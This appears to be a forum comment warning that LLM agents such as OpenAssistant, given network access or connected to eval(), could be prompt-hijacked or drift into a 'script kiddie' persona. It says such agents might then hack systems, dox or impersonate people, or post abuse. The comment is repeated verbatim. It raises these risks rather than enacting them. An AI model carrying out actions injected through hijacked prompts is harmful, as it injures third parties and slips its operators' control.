But in short, as I said in my GP comment, systems like OpenAssistant are being given the ability to make network calls in order to take actions.
Regardless of whether the system "knows" what an action "means" or if those actions construe "harm", if it hallucinates (or is prompt-hijacked into) a script kiddie personality in its prompt context and starts emitting actions that hack external systems, harm will ensue.
Perhaps at first rather than "launch nukes", consider "post harassing/abusive tweets", "dox this person", "impersonate this person and do bad/criminal things", and so on. It should require little imagination to come up with potential harmful results from attaching a LLM to `eval()` on a network-connected machine.
But in short, as I said in my GP comment, systems like OpenAssistant are being given the ability to make network calls in order to take actions.
Regardless of whether the system "knows" what an action "means" or if those actions construe "harm", if it hallucinates (or is prompt-hijacked into) a script kiddie personality in its prompt context and starts emitting actions that hack external systems, harm will ensue.
Perhaps at first rather than "launch nukes", consider "post harassing/abusive tweets", "dox this person", "impersonate this person and do bad/criminal things", and so on. It should require little imagination to come up with potential harmful results from attaching a LLM to `eval()` on a network-connected machine.